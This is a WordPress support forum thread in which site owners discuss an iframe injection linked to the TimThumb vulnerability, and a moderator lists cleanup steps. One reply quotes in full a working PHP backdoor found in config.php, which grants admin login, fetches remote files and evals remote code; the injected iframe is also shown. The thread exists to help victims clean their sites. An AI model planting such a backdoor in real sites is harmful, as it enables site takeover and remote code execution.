[TimThumb Vulnerability] iframe hack

  • Hi,

    have somebody more info about

    <iframe id="iframe" style="width: 1px; height: 1px;" src=" https://counter-wordpress.com/frame.php">
<html>
<head>
</head>
<body>
</body>
</html>
</iframe>

    Somebody hacked all my WP sites…

    THX to all who will help.

Viewing 15 replies - 1 through 15 (of 59 total)

  • I am hosted on Bluehost.com. I was speaking to a customer service rep today. He said he noticed this appearing in an iframe on a non-Wordpress site. I have this on some of my sites also. I would appreciate any information anyone has.

    Thanks

    Miles

    Thread Starter x1code

    (@secretja)

    I ha have re upload all wp sites and now is all ok. One one non wp site I notice the same thing but I did the same like and wit wp sites.

    Good luck Miles.

    I just got this exact iframe hack on my wordpress site. I have scoured many many files, run antivirus/malware checks on the whole site without any success. I am hosted with VentraIP.com.au. This seems like a new hack given OP posted 2 hours ago. I noticed this just yesterday.

    Look in config.php

    delete code:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == ''){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

    There is somwhere else, still looking. I don’t know how they hack the site…

    Regards!

    I also re-uploaded my WP files, and everything seems to be in order again – for now at least!

    Interesting, seeing the same iframe code in some of my Joomla sites too.

    I’m not sure what it does, but I have had sites that have been redirecting to other locations (sometimes sleezy, music playing, etc…).

    But I have also been upgrading timthumb so those things could be related to that.

    @secretja, What do you mean by reupload? Are you installing a fresh theme, or exporting the content of an old site and creating a new wordpress site? I’m afraid to download the whole database for fear it might have malicious code in it…

    Thanks for all your help….

    Thread Starter x1code

    (@secretja)

    Hi,

    it is not in theme files… somewhere else it is. I downloaded fresh wp and I have upload/upgrade all wp sites. Now is OK.

    Got this as well after being affected by PHPRemoteView via timthumb ….

    Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday (In my case a JS), it came back this morning …

    Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. The code is obfuscated ….

    I already mention it on a PHPRemoteView topic ….

    https://www.ads-software.com/support/topic/two-strange-errors?replies=22#post-2289404

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    Once you’ve removed TimThumb, you STILL need to perform the usual steps.

    1) Change ALL YOUR PASSWORD
    2) Scan ALL your files (esp .htaccess) for anything hinky.

    Best would be to delete and re-upload everything fresh, and then change every single password, from WP to FTP and SQL.

    Damn sometime i’m a tool, i just forgot to upload the clean wp-config.php ….

    Anyway, still looking to be sure ….

    Spirit_of_Martin, my php is a little bit rusty, but, basically, this bit of php, gave the attacker the cookie of the admin, in the first condition, the second look like some kind of scanner/patcher, and the third a file downloader ….

    My guess is that there’s a tool on top of it (On another server or computer) ….

    The same thing happened to us today on our site. We’ve been getting hit with attacks all seemingly coming from the timthumb vulnerability. We have updated timthumb but this keeps happening. I’m guessing there’s a missing back door somewhere.

    What’s really concerning to me is that my site’s database password has been commented out and changed. I’m wondering if there’s anything wrong with my database now…

    Thread Starter x1code

    (@secretja)

    I got it again. Damn.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    Then you’re not cleaning it up right.

    Best way at this point would be to do this:
    1) backup EVERYTHING to your PC. Files and DB.

    2) DELETE the files on your server. Yeah. Don’t worry, your posts are on your database, we’re leaving that alone.

    3) Change your passwords fro SSH/FTP and SQL

    4) On your PC, review the following files:
    .htaccess
    wp-config.php

    They look okay? Good. Copy them back up to your server (remember to edit your wp-config.php with your new SQL password).

    5) Get FRESH and CLEAN downloads of WordPress, all your themes and plugins

    6) As soon as you get in, change your passwords.

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone?

Viewing 15 replies - 1 through 15 (of 59 total)
  • The topic ‘[TimThumb Vulnerability] iframe hack’ is closed to new replies.